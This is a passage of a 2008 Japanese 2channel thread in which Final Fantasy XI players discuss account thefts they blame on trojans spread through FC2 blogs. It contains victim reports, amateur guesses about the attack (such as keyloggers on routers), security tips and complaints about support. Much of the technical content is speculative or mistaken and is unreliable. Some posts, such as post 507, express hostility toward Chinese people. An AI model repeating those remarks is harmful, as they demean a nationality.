上にもいくつか書いてあるけど公式とかeLeMeNにしかけられたらもうどうしようもないなぁ

425 名前:既にその名前は使われています [2008/03/25(火) 03:16:21.11 ID:F65+mqFc]
公式やられたらFF終了だなw

426 名前:既にその名前は使われています [2008/03/25(火) 03:17:04.37 ID:/5SLOYFD]
>>415
そういうwikiとwikipedia云々みたいなのはどうでもいいんだけどなあ。
危機感もってないよねという話よ?

427 名前:既にその名前は使われています mailto:age [2008/03/25(火) 03:18:46.04 ID:/FYPYPr8]
すっげな。
オリンピック中止だが、日中の格闘で熱いな。

というわけで、マツリ上げ

428 名前:既にその名前は使われています [2008/03/25(火) 03:19:08.78 ID:QRet0Lrm]
■としてはどうおもってるんだろうねー?

もはや、レアケースで放置できる状態でもないし、
時間が経つことで自然に改善される類の問題でもない。

なにか手を打たなきゃいけないところまではきてるのは間違いないけど、
中途半端な手を打つと、無駄なコストがかかるだけで、
下手すると余計にセキュリティホール増やすだけの結果に終わるかもしれない。

429 名前:既にその名前は使われています [2008/03/25(火) 03:19:15.32 ID:9HKbKXJk]
>>425
公式やられたら確実に動くからそれはそれで好都合なんだがw

430 名前:既にその名前は使われています [2008/03/25(火) 03:22:25.37 ID:o+wp7W1W]
>>421
410ではないが、
1.PC(FF未インストール)が罠サイト踏む
2.PCにトロイ仕込まれる
3.遠隔でPC→ルータをハック -> ルータにキーロガー仕込む
4.ユーザがPS2でログイン -> この時にキーロガーでパスゲッツ
5.パスを適当なサイトかメールに送信 -> ( ゚Д゚)ウマー

とかじゃねーの?
コリジョンドメインはマンション内の奴をハックしたいとかじゃねーかぎり、
関係ないと思われwww



431 名前:既にその名前は使われています [2008/03/25(火) 03:22:48.80 ID:gG9qutBm]
>>421
俺はPS2ユーザーなんだが、先日アカハックの被害受けた
親族・友人含め誰もパスとIDを知らない
フレにも同じ状態でハックされたやつが2人いて
3人に共通することはルーターでPCも繋いでて、該当blogを踏んだこと
PS2・箱でFFやってるフレはいっぱいいるが
被害にあったのはルーターで繋いでる奴だけだから、ルーター接続も怪しいと踏んだ

432 名前:既にその名前は使われています [2008/03/25(火) 03:23:49.30 ID:czdY66qa]
ルータにキーボードをつなぐのはレアケースかと

433 名前:既にその名前は使われています [2008/03/25(火) 03:23:52.43 ID:QAtiHfpn]
垢ハックやった奴は死刑確定!
という世界基準でもできなければ普通のダンボールで銃の弾を防ぎ続けるような防戦一方のままだ。罪軽いから捕まっても出てくればまたやりだす。中華はRMTでもっている連中だからな。

434 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:26:00.83 ID:QRet0Lrm]
>>421
同情するよ。こんなんだからハックされるんだよな。。。

コリジョンドメインの説明とかしたくなっちゃうだろうけど、
結局、個別に全部レスしてくハメになるだろうし、
ほうっておいたほうがいいと思うよ。

435 名前:既にその名前は使われています [2008/03/25(火) 03:26:23.67 ID:OfQJmMS+]
自分もハックされてフレも2人ハックされるってどんなんだよw
それはちかばに犯人がいるんじゃねえの?w

436 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:26:45.55 ID:PhXDparI]
ニュー速とかでスレ立つのが一番良いのかもな
ネ実だけじゃ、大手や公式が取り上げる程の騒ぎですらないんだろう

437 名前:既にその名前は使われています [2008/03/25(火) 03:26:52.68 ID:F65+mqFc]
よくわからんがADSLの機械に直接PS2とPCぶっさしてるのだと大丈夫なんかな
ルータって無線ルータのことよね
馬鹿でスマソw

438 名前:既にその名前は使われています [2008/03/25(火) 03:27:01.09 ID:vHIgAKgq]
>>431
PCでリンクシェルコミュだとかフレンドリスト+とか使わなかった?
俺も似た環境だから気になる。

439 名前:既にその名前は使われています [2008/03/25(火) 03:27:07.50 ID:gG9qutBm]
>>435
爺鯖だがそんくらい多発してる

440 名前:既にその名前は使われています [2008/03/25(火) 03:27:54.09 ID:/5SLOYFD]
>>430
ルーターに仕込むのではなくてあくま仕込むのはPC。
PCからルーターを監視して、PS2など他の機器からルーターに流れるデータを拾って送信。
感染したPCと同時に起動してなければ大丈夫。
という話ではなかったかな。



441 名前:既にその名前は使われています [2008/03/25(火) 03:28:08.71 ID:o+wp7W1W]
>>432
レアケースだと思うが、
それがハックと何か関係あるのか?www

ルータのハックは遠隔で行うんだぞ?

442 名前:既にその名前は使われています [2008/03/25(火) 03:28:17.51 ID:OfQJmMS+]
>>439
まじかよ
こえええええ

443 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:28:22.15 ID:DxM7+BBt]
>>430
>3.遠隔でPC→ルータをハック -> ルータにキーロガー仕込む
>4..ユーザがPS2でログイン -> この時にキーロガーでパスゲッツ

だうと。キーロガーはコンソールからの入力を

>5.パスを適当なサイトかメールに送信 -> ( ゚Д゚)ウマー

ルータがメール送受信言語話せるのかな?

444 名前:既にその名前は使われています [2008/03/25(火) 03:28:31.34 ID:gG9qutBm]
>>438
両方使って無いね

445 名前:既にその名前は使われています [2008/03/25(火) 03:29:26.33 ID:vHIgAKgq]
>>444
ありがと、俺も対策せんとあかんなこりゃ。

446 名前:既にその名前は使われています [2008/03/25(火) 03:30:58.82 ID:qu/cuoZy]
フリーのソフトでもキーロガー対策の何か入れておいたほうがよさそうだなぁ
なんか今回の件でPCウィルスの怖さを改めて実感した気がする

447 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:31:06.08 ID:QRet0Lrm]
>>431
悪いけど、ちょっと興味深いなw

その後ウイルスチェックはしてみた?
もしくは、許可の無いソフトが通信をしようとすると警告してくれるような
ソフトは誰かいれてなかったの?

448 名前:既にその名前は使われています [2008/03/25(火) 03:31:54.01 ID:PhXDparI]
ずっと下げてた…スマソ

FC2のトップだけ見たけど、何の告知も無いね
そもそも使わなくなったけど、お知らせメールだけは届くようにしてるから
何らかの発表があれば、メールでも届くはずだしなぁ…

449 名前:既にその名前は使われています [2008/03/25(火) 03:32:15.77 ID:/5SLOYFD]
仮にパスワードを保存させずに毎回入力する仕様になったとしても
今度はキーロガーを仕掛けてくるようになるだけなんだろうなあ。

450 名前:既にその名前は使われています [2008/03/25(火) 03:32:59.76 ID:qr3SW834]
>>431
>>>438でも聞いてるけど、前にPCでLSコミュニティ使ってた人が
PS2でゲームしてたのに垢ハックされたって報告もあったからそれとは違うのかな?



451 名前:既にその名前は使われています [2008/03/25(火) 03:33:16.50 ID:1JHdDmwn]
>441
ルータにキーロガーすごいですね

452 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:33:40.86 ID:I+pa9CDk]
最近垢ハック多すぎないか?
今日の緊急メンテは是非なんらかの対処を・・・


453 名前:既にその名前は使われています [2008/03/25(火) 03:34:01.37 ID:qr3SW834]
ごめ・・・リロードしたら答え書かれてましたorzスルーしてください

454 名前:既にその名前は使われています [2008/03/25(火) 03:34:47.00 ID:o+wp7W1W]
>>443
ハックしたなら、
ルータにインスコされている(と思われる)MUA起動させて送るなり、
直接MTAを送って起動させるなり、
TXTでログ残しといて拾うなりなんでもいいんじゃね?www

いや、俺が知らないだけで、今時はしらんけど、
ルータがSTMP喋るとは思わんよwww

455 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:34:52.55 ID:fAiOj5Ix]
>>452
するわけがない。
その確信がボクらとスクエニが長年培ってきた絆

456 名前:既にその名前は使われています [2008/03/25(火) 03:35:03.66 ID:jq6H0asz]
ルーターに仕込まれるというか、PCとPS2を一つのハブ(ルータ)に繋げてログインした場合、
PCにキーロガーが仕込まれていると、ハブ(ルータ)に流れるPS2のパスが抜かれるって所だろう
つーか、FFのログイン認証ってSSL等で暗号化してないんだな
そりゃハックされるわw

457 名前:既にその名前は使われています [2008/03/25(火) 03:35:12.03 ID:lJNgXUoS]
>>437
お前と同じ状態だがウィルスサイト踏みまくったけどなんともないから大丈夫だろw

458 名前:既にその名前は使われています [2008/03/25(火) 03:38:02.05 ID:czdY66qa]
友達にスーパーハカーがいるヤツ湧きすぎ
面白いけどあまり釣りすんなってw

459 名前:既にその名前は使われています [2008/03/25(火) 03:38:44.82 ID:gG9qutBm]
>>447
定期スキャンでトロイが発見されたからOS入れ替えて
FFにログインしたらアイテム全損状態だった
警告してくれるソフト入れてたにも関わらずスルーだったから気づけなかった

460 名前:既にその名前は使われています [2008/03/25(火) 03:39:49.77 ID:qxJBwIeb]
ルーターにキーロガー仕掛ける発想はなかったは



461 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:41:19.79 ID:DxM7+BBt]
>>454
MUAだろうがMTAだろうが
個人宅にPOPやSMTPプロトコルしゃべれるルータは無いよねぇ。

せいぜいHTTPやFTPで設定するくらい。

462 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:41:21.85 ID:QRet0Lrm]
その警告してくれるソフトは、警告してくれないソフトだと思うw

463 名前:既にその名前は使われています [2008/03/25(火) 03:47:07.36 ID:gG9qutBm]
>>462
AntiVirとAVG+ZoneAlarmって警告してくれるんじゃないのか?

464 名前:既にその名前は使われています [2008/03/25(火) 03:48:13.96 ID:YeO0sQOu]
PS2でハックされた人はLSコミュのパスとログインパスが同じで
それキーロガーに拾われてたりしない?

465 名前:既にその名前は使われています [2008/03/25(火) 03:49:54.30 ID:LtRgK+Go]
かすぺwうぜぇなwwww
オミトロン挟んでる環境なのに強制的にIEで鯖にパッチ取りに行きやがる
しかもセッション細切れにするから一々FWのアラート出てうざい
パッチ落としきるまで何回許可クリックさせるつもりだこれ

※IEを直でスルーさせるつもりは毛頭ございません、市ねかすぺ

466 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:51:50.35 ID:DxM7+BBt]
>>465
設定をみなおそうよ

467 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 03:54:02.30 ID:rvQA3x19]
よく考えたら、カスペだけスキャンできるのもおかしいよなあ。

何か裏が・・・!

468 名前:既にその名前は使われています [2008/03/25(火) 03:57:06.11 ID:czdY66qa]
>>456
リピータハブ内蔵のブロードバンドルータって珍しくない?
あと、ログイン認証はMD5使ったchallenge & responseに見えるよ
ログイン後のPOLコンテンツもダイジェスト認証のようだからやっぱりC&R

469 名前:既にその名前は使われています [2008/03/25(火) 03:57:13.16 ID:LtRgK+Go]
なぜかかすぺの鯖がLive2chを叩き始めた
なんぞこれ

>>465
こういうのをスルーするような設定はセキュリティ的によろしくない

470 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 04:00:50.04 ID:hKaE50zj]
なんかもう面倒になってきたからFC2のドメインをブラックリストにいれてみた。
どれだけ予防してても踏んだらひっかかりそうだし
そもそもブログなんてそんなみねーし(´・ω・`)



471 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 04:01:59.63 ID:rNeX04xY]
>>467
新種のウイルスが登場した時に〜のソフトだけ動きが速くしばらく対応ってのはよく
あるよ。

472 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 04:03:30.70 ID:rvQA3x19]
新種というより亜種だよね

473 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 04:06:46.09 ID:CPKgTWTl]
業者対策とは全く関係ないバージョンアップだった。
www.playonline.com/ff11/polnews/news12894.shtml

474 名前:既にその名前は使われています [2008/03/25(火) 04:13:22.67 ID:XVxvaSh9]
もう業者じゃなくて奴らのことは犯罪者でいいだろう。



475 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 04:14:37.98 ID:rNeX04xY]
■コンフリクト(PvP)において、侍のウェポンスキル「石火之機」
 の効果を調整しました。

自分の作ってるゲームのアビすらわからん連中に期待しない方がいいかもなぁ。

476 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 04:18:50.22 ID:DxM7+BBt]
>>475
誤爆かな?

スクエニはスクエニ。ここはここ。
要望は送るけれど、自分たちで身を守る術を身に着けるのだ。

477 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 04:20:20.45 ID:fAiOj5Ix]
>>473に宛てたレスじゃね?

478 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 04:21:24.24 ID:DxM7+BBt]
あぁ、なるほど

479 名前:既にその名前は使われています [2008/03/25(火) 04:21:49.13 ID:xwSNSLwB]
>>434
ありがとう、静観することにするよ。
パスワードファイル抜かれても、それだけじゃ他人にログインされない
多重の対策をスクエニがしてくれるのを静かに祈る。

480 名前:既にその名前は使われています [2008/03/25(火) 04:24:10.01 ID:Gcfn1S+u]
黒猫見たいんだがなー
怖くて見れないわ
あそこはかなりソロ参考になるから閉鎖はしとほしくないな…




481 名前:既にその名前は使われています [2008/03/25(火) 04:34:10.63 ID:jonVo59q]
俺のリアルフレに、FFプレイヤーじゃないんだが
常駐の付加が嫌だとセキュリティ対策しない奴がいる
なにを言ってもむだ
見つけたら削除してるから別に平気とか抜かす

こういうやつが踏み台になって攻撃してると思うと豆腐の角に頭ぶつけて死ねと思ってしまう

482 名前:既にその名前は使われています [2008/03/25(火) 04:41:03.82 ID:qr3SW834]
バハ鯖、メンテ前に垢ハックされたキャラがまたインしてアイテムと戦績の処分しだしてる
現在は白門の貨幣交換の前にいるみたい

483 名前:既にその名前は使われています [2008/03/25(火) 04:41:23.06 ID:yIiyHr+s]
一通りスキャンし終えてから、パスワード15桁にして
保存しないようにすれば大丈夫かな?

484 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 04:44:15.39 ID:DxM7+BBt]
>>483
何が入れられたかにもよりますが、OSインストしなおしたほうが良いのではないでしょうか。

485 名前:既にその名前は使われています [2008/03/25(火) 04:44:50.94 ID:wc2s+Fxx]
何度も言われてるけど、根本のシステムに馬鹿でかい穴がある以上は「大丈夫」なんてことは絶対に無い。

486 名前:既にその名前は使われています [2008/03/25(火) 04:51:40.80 ID:PhXDparI]
あのさぁ、まーたログインできなくなってんだけど
自分の設定するPOLのパスワードがおかしいのかね

別に垢ハック受けてる訳ではなさそうなんだが、ログインできなくなる
パスを間違ってるなんて有り得ないんだが…どうなってるんだコレ

487 名前:既にその名前は使われています [2008/03/25(火) 04:52:30.36 ID:LtRgK+Go]
本当に心配なら罰箱かPS2かPS3の60Gでも買って移行するとかしとけ
PCのままにするなら必要な物はバックアップしたあとOSごと入れなおした方が無難

>>486
中華が物色中じゃねーの

488 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 04:54:08.60 ID:DxM7+BBt]
>>486
垢ハック受けてない自信があるのならいいけれど、
大文字小文字全角半角をちゃんと確認しましたか?

489 名前:既にその名前は使われています [2008/03/25(火) 05:01:44.40 ID:PhXDparI]
>>486-487
前も同じ事があって、垢ハックの可能性もあるから
OS毎再インスコしたし、パスも間違ってない
↑スクエニに問い合わせた時に仮パス貰って即変更した

まさか、特定のパターンのパスはバグるとか無いよな…

490 名前:既にその名前は使われています mailto:age [2008/03/25(火) 05:02:57.51 ID:rvQA3x19]
そもそも二重ログインできることがおかしいんだよな。
どんだけ馬鹿なんだか



491 名前:既にその名前は使われています [2008/03/25(火) 05:14:39.76 ID:PhXDparI]
レス番付け間違えてるや…>>487-488さんレスどうもね
またサポセン凸して、今度はパスの設定状況どうなってるか聞いてみる
昨日の今日でまた問い合わせなんて、やってらんねー

つか、土曜日に出したメールも放置だったし、どうなってんだかサッパリ分からん

492 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 05:15:58.50 ID:DxM7+BBt]
>>489
スクエニに問い合わせて再度パスを発行してもらってその後変更。
変更後のID・パスも大文字小文字等完全に入力ミスが無いなら
キーボードを疑ってみるというのもひとつの手です。

それ以外はわからないや。すいません。
今日は平日だからスクエニに聞くしかないかもです。

493 名前:既にその名前は使われています [2008/03/25(火) 05:23:44.66 ID:LtRgK+Go]
>>491
>>123はパス変更の履歴は確認できてるみたいだから、まずそれで調べてみたら
同時ログインでバッティングしてなければログインできない場合はパス変更されてる時
だと思う
あとはセキュリティきつくしすぎてPOL鯖との通信がしっかり出来ていない場合も考えられる
FWを入れた場合は、TCPのOUTとUDPの双方向のPOL鯖への通信が許可されてるか
調べてみてくれ
細かくルール設定したい場合は鯖アドレス群が3つがあるから範囲はJPNICで調べてね

494 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 05:29:12.55 ID:DxM7+BBt]
>>493
あー、そっかOSインストールしなおしなら
WindowsデフォルトのFWではじかれる可能性もありますね。

一個一個外しながら試してください>>491さん

495 名前:既にその名前は使われています [2008/03/25(火) 05:41:06.90 ID:PhXDparI]
>>493-494
FWは、何度も設定解除しつつ確かめたけど問題無さそう
パスが違うと出て、どうにもならない…
>>123さんのようにログインできるようになったら履歴見てみる

たんに自分の打ち間違いと思いつつ、とりあえず寝る\(^o^)/

496 名前:既にその名前は使われています [2008/03/25(火) 05:44:14.24 ID:wU4wL3FZ]
>>495
寝たかな
メモ帳ひらいてパス打ってコピペしてみるといい


497 名前:既にその名前は使われています [2008/03/25(火) 06:46:58.20 ID:/DG1q5Vn]
ずっとFFロギンしてればいいんじゃね?

498 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 06:52:47.94 ID:cH7gyrCH]
アカハックとかされるのは

元をただせば RMTで金になるからなんだよな
誰もかわなかったらアカハックされるわけがない
金にならないからな

499 名前:既にその名前は使われています [2008/03/25(火) 07:02:11.71 ID:rCq1aPP7]
>>497
POLは何故か後からログインが優先されるはず
コレって何故なんやろ

500 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 07:02:32.03 ID:NxOTbSzI]
>>264
これと全く同じ構成でパス抜かれた俺。
結局対処しようがないんだよな。
FF引退できたから良いことちゃいいことだが。




501 名前:既にその名前は使われています [2008/03/25(火) 07:05:07.20 ID:YgFIpP6m]
おいおいこわくて2ちゃんしか見れねえよw

502 名前:既にその名前は使われています [2008/03/25(火) 07:08:25.03 ID:5CNURpEQ]
>>499
おかしいよな〜・・・
FFは回線切断後に即再ログインするとすでにログインしてるだの言われてけられるというのに。


503 名前:既にその名前は使われています [2008/03/25(火) 07:09:43.51 ID:YgFIpP6m]
システムがクソと言われる所以じゃね
しらねえけど

504 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 07:11:34.95 ID:bp4N7Sb+]
>>500
結局IEがガンなのかねえ・・。
Sleipnirも結局はIEのエンジン使ってるんだっけ?

505 名前:既にその名前は使われています [2008/03/25(火) 07:33:38.12 ID:1Scke0MT]
>>264
>SleipnirのレンダリングエンジンにIE使ってたら何も変わらんけどなw

>>276
装備倉庫から1ジョブ分総入れ替え、薬品倉庫からがっつりできなくなるなw

>>277
何の解決にもならんよ。不正アクセスされることが前提じゃん。
対策すべきは、MACアドレスまたはIPアドレス、その他も加えた認証に入れないとな。

>>291
>>279

>>304
いい対応案だね。いっそMACアドレス認証もありかなって思うね。もう

>>321
残念。電子データの持ち主はユーザじゃなくてサービスプロバイダだ。
さらに不正アクセスされたのもサービスプロバイダだ。
ユーザは被害届すらだせんよ。

506 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 07:43:49.61 ID:5K38i1Dh]
>>502
FFは先出し優先、POLは後出し優先、という謎仕様だったりして
FFにログインするにはPOLにログインしないといけないので、先出し優先処理が無駄に

507 名前:既にその名前は使われています [2008/03/25(火) 07:53:00.17 ID:WT1MZrdK]
狡猾な中国人に鉄槌を

508 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 07:55:35.57 ID:bp4N7Sb+]
>>507
なぜか、かつてマフィア(Mafia)の語源の一つと言われてた「Morte alla Francia Italia anela!」

これ思い出した。


509 名前:280 [2008/03/25(火) 07:57:28.06 ID:mx3cOLzk]
さっき起きた。
GMコール開始。
フレのアカウント、鯖移動させられてたよ・・・ひどすぎる

510 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 07:58:08.82 ID:bp4N7Sb+]
>>509
ひどいな・・・・。
仲間が・・・仲間が・・・。
ひどいな・・・。



511 名前:既にその名前は使われています [2008/03/25(火) 08:02:06.63 ID:WT1MZrdK]
自分も垢ハックされたフレのキャラがどうなってるか気になる

280さんお疲れさま、これからも逐次経過報告お願いします

512 名前:既にその名前は使われています [2008/03/25(火) 08:03:11.35 ID:nkc48CPC]
授業料だと思うしかないな。。。
これでセキュリティをしっかり意識することになるだろう。

513 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 08:05:44.11 ID:cH7gyrCH]
ゲームでよかったな
現実で金盗難よりはるかにマシだな

514 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 08:05:49.15 ID:gtQCsYDw]
あやしいURLは踏まない、で避けられないからな。
暗号化したURLしこんでたり素人目には何が何だか…

515 名前:既にその名前は使われています [2008/03/25(火) 08:06:34.10 ID:NDcMsGSZ]
>>513
そっちの方が色々とやれるだけましな気もするがな

516 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 08:07:44.85 ID:cH7gyrCH]
対策として、今使ってるプロバイダ以外のアクセスははじくとかしないといかんかもしれんね

517 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 08:07:47.45 ID:tbTqVBho]
個人情報の漏洩、それに対するずさんな対処と管理って事で□eの事をどこかに通報いたほうがいいのかね?

518 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 08:08:18.43 ID:bp4N7Sb+]
>>515
だなあ、警察もちゃんと動きそうだが・・・。


519 名前:既にその名前は使われています [2008/03/25(火) 08:11:49.28 ID:1Scke0MT]
>>333
解除できちゃダメでしょ。解除できた時点でフリーハンドじゃん。

>>338,353
ID/pwに頼ってたら同じになっちゃうから、生体認証かハード縛りいるねぇ

>>339,395
ふと思ったんだが、BLOG持ちやWEBページ持ち多いじゃないか。
ここでバッジ作って各自のに張り付けて、SSTの意見メールフォームにリンクするのは
どうかいね?
Stop! RMTみたいに
ttp://www.stop-rmt.com/

>>373
なんでいちいち分散させたがるんだ? 逆効果が目的じゃないかとを勘ぐりたくなるぞ

>>403
PG2はマウルェア駆除してくれね〜ぞ、と

520 名前:280 [2008/03/25(火) 08:12:04.07 ID:mx3cOLzk]
>>513
鯖移動だとお金かかるから、盗難みたいなもんだよ。
本人なにもしてないのに、みぐるみはがされて鯖移動手数料まで持ってかれるんだ。




521 名前:既にその名前は使われています [2008/03/25(火) 08:17:07.70 ID:n+/0QQNY]
ハックされたやつはハックされる前までのセキュリティ状況をもう少し詳しく書いてほしいな

・アンチウィルスソフトの名前
・定義ファイルは普段から更新していたのか
・ブラウザとブラウザのバージョン
・OS
・WindowsUpdateは普段から最新版にしていたのか
・パス抜きが仕込まれていたと思われるブログを閲覧した時間帯と、業者にログインされて強制的に落とされた時間帯の明記

522 名前:既にその名前は使われています [2008/03/25(火) 08:23:58.46 ID:qlyvOiMi]
>>517
アホか

それが出来るとすれば□が管理する場所において漏洩とか起きてなきゃ無理

523 名前:既にその名前は使われています [2008/03/25(火) 08:42:31.11 ID:ymC/GTmn]
犯罪にあって勉強になったとか
そんなんだから相手がナメられんだよ
自分のためにも、これから犯罪にあうかも知れない人のためにも
毅然と戦え、立ち向かえ

524 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 08:43:42.00 ID:tbTqVBho]
>>522
POLインすれば個人情報丸見えなのに□の管理関係ないのか?

525 名前:既にその名前は使われています [2008/03/25(火) 08:44:57.73 ID:fR9STV/f]
>>524
デバッグもユーザー頼りなスクエニだから、
POLにインした時点でハックされる可能性も完全同意+自己責任って方針なんじゃね?

526 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 08:45:44.76 ID:cH7gyrCH]
>>523
で?警察、スクエニに連絡スル以外の方法をかけよ

527 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 08:46:37.85 ID:tbTqVBho]
あとハックされた後の対処さ
「もう1つアカ用意してログイン後通報しないと対応できない」

おかしいだろこれ

528 名前:既にその名前は使われています [2008/03/25(火) 08:50:32.95 ID:GO6bIFih]
>>489
つか、そんなに気になるなら
POLのサービスの履歴見て自分でパス変更かけてない時期にパス変更あったかどうか見ろと

529 名前:既にその名前は使われています [2008/03/25(火) 08:51:19.50 ID:Q74sBmBw]
>>517は現金とられたらの話をしてるだけだろ

530 名前:280 [2008/03/25(火) 08:53:01.77 ID:mx3cOLzk]
GMと話はしたが、
・インフォメーションセンターに本人が連絡しろ
・アカウントの管理は個人の責任
 被害にあわないための対策も公式サイトに載ってるから、それを見ろ

と、本人じゃないので全く聞く耳持たず。
まぁ、俺がGMでも同じ対応すると思うが。

とりあえず、対策をしていても新しい手法が次々と出てきていて、被害に会う人が続々出てきていること、なにか対策を考えてほしいこと
インフォメーションセンターの24時間対応化などを要望しておきました。

要望したら、要望はフォームからしてくれと言われたが(´_ゝ`)

フレのアカウントは別鯖表示のままだ。
なにやってるか知らないけど、ホントムカついて涙出てくる。
何もできないのが悔しい。



531 名前:既にその名前は使われています [2008/03/25(火) 08:58:05.44 ID:CJuWmpLQ]
>>519
プラチナリボン張ってるFFブログもそんなに数ないよなー
発信元のROと比べてるからそう感じるだけかも知れないけど。

532 名前:既にその名前は使われています [2008/03/25(火) 08:58:40.91 ID:EH31oboY]
>>530
仮にそれ認めたらHNMLSで張り込み時に落とし合い可能になるじゃねぇ、バカじゃねぇのw
ライバルLSのリーダーのフレですが中身中華ですから落としてくださいとか?
ま、たかがゲームで営業日営業時間に直接電話してこいなんて無職ニートでもなきゃ
無理だしそこは24時間対応して欲しいけどね。

常識的に考えてDupeやExploitやCheatに転用されそうな事をするわけがないだろ。


533 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 09:01:23.03 ID:mjgaBnF1]
>500
dda3■net、hellh■net
この辺ってアメリカの鯖みたいだしPG2で遮断できないみたいよ
ノートンはザルと何度もry

534 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 09:04:56.80 ID:U5OFwJAr]
なんだかここ数日の書き込みがすごいな。
つまり垢ハックも多数発生してるのか。
俺は知り合いがハックされてからここに来ているが、
だんだん巧妙化してきてるな。

あと、お前等に質問。
業者キャラには一定の名前が冠でつけられてないか?
垢ハックされてその商品を出品するなりバザーするんだが
例えばバハ鯖なら
Ba○○○もしくはBah○○○
おでんならOd○○○もしくはOdi○○○
というように。競売出品されたものは止められないが
バザーならある程度の認知で止められるんじゃないかと
思っただけなんだけどな。


535 名前:既にその名前は使われています [2008/03/25(火) 09:05:15.23 ID:qlyvOiMi]
>>524
□がIDとパス漏洩してってならまだしも、それ以外の状況でPOLに勝手にinされる
としたらユーザーサイドでの管理上の問題だってあり得るだろ

□が全く悪くないとは言わないが何でもかんでも□の責任にすりゃいいって言うものでもない

536 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 09:06:48.67 ID:cH7gyrCH]
>>534
かうなといっても安かったらNAがかったりするから意味がない

537 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 09:07:28.39 ID:FdVfr1o9]
アドバイスください。
昨日深夜知り合いのブログアクセスした直後URLみてfc2なのに気づき、
あわててブラウザ落としてこのスレみてカスペルのInternet Security ダウンロードしてインスコ→アップデート。
PCのLAN抜いてInternet Securityでセキュリティレベル高で完全スキャン。
平行してPS2でログインしてPC用垢のパスワード変更。
スキャンしかけたまま寝て起きたら、脅威なし、になってました。
これは運よくハックには引っかからなかったということでしょうか?
あと、何かしたほうがいいことがあれば夜やろうと思うので教えてください。

538 名前:既にその名前は使われています [2008/03/25(火) 09:10:19.83 ID:ymC/GTmn]
スクエニに電話して聞いてみ?
これだこしたら大丈夫ですかって
煽りじゃなくて、まじでさ

539 名前:280 [2008/03/25(火) 09:11:46.36 ID:mx3cOLzk]
>>532
うん、それはそうだね。
ただ、被害にあってる人がリアルタイムでいるよと運営側に伝えたかっただけなんだ。


24時間対応はしてほしいよなぁ。
本人アクセスしてないの分かってるのに、目の前にそいつのキャラがいて、運営にリアルタイムで連絡できる手段がないのはかなり痛い。
やられ放題だからな。

540 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 09:12:00.37 ID:n+/0QQNY]
>>537
FC2だからって問答無用でウィルスに感染するわけじゃないぞ



541 名前:既にその名前は使われています [2008/03/25(火) 09:13:08.99 ID:Yn5RmBrH]
>>537
しらんがな

現状「ログインできなくて感染に気づく」だしなぁ
FC2だからって全部じゃないぞ!その知り合いのアドレスでも貼ってみてくれ

>あと、何かしたほうがいいことがあれば夜やろうと思うので教えてください。
押入れの掃除

542 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 09:15:02.73 ID:tbTqVBho]
>>535
ハックされた者の現状の対処についてどう思うよ

GM「本人がインして報告してください」

これも2アカ持ってない本人が悪いですかそうですか

543 名前:既にその名前は使われています [2008/03/25(火) 09:15:11.41 ID:BTWfPp0b]
>>537
FC2全てのブログがウィルスをばら撒いている訳ではない

544 名前:既にその名前は使われています [2008/03/25(火) 09:17:28.35 ID:+BGb3nuS]
>>537
ログインパスワード変更とオートログイン解除しとけ

FC2ブログが全部が全部罠まいてる訳じゃないからそのビビり具合は酷いが
安全っつー保証もないしな

545 名前:既にその名前は使われています [2008/03/25(火) 09:22:42.28 ID:4rU7fOzS]
中途半端な知識な奴の情報が乱れ飛んでるな
興味あるのが>>431のケース

・フレンドリスト+のようにPS2以外でPOLパスワードを入力したことがあるか
 今は使って無くても残っていたらアウト、アンインストールで完全に消せているか未確認
・漫画喫茶等でFFをプレイしたことがないか
 今騒いでるハッキング手口とは別のキーロガーを仕込まれている可能性がある
・単純なパスワードに変更していないか
 総当たりや辞書ですぐに当たるパスワードならアウト

でもなんか ID:gG9qutBmの発言おかしいなw


546 名前:537 mailto:sage [2008/03/25(火) 09:26:44.34 ID:FdVfr1o9]
アドレスはackyff11.blog25.fc2.comです(宣伝乙とかいわないで・・・)。
これから先は対策をするとしても、現時点で自分のPCが大丈夫なのかどうか、
調べるすべはないんでしょうか?

547 名前:既にその名前は使われています [2008/03/25(火) 09:26:44.22 ID:ymC/GTmn]
>>542
ブラックジョークにしかならんな

548 名前:hoge [2008/03/25(火) 09:27:40.25 ID:G+s+oZhz]
みんな〜こんなあびねーゲーム引退しちゃえよぉう、、、
そう引退した時レモラ鯖の俺にギルわたしにくるよぉうに
、、、うぇうぇおおう、、

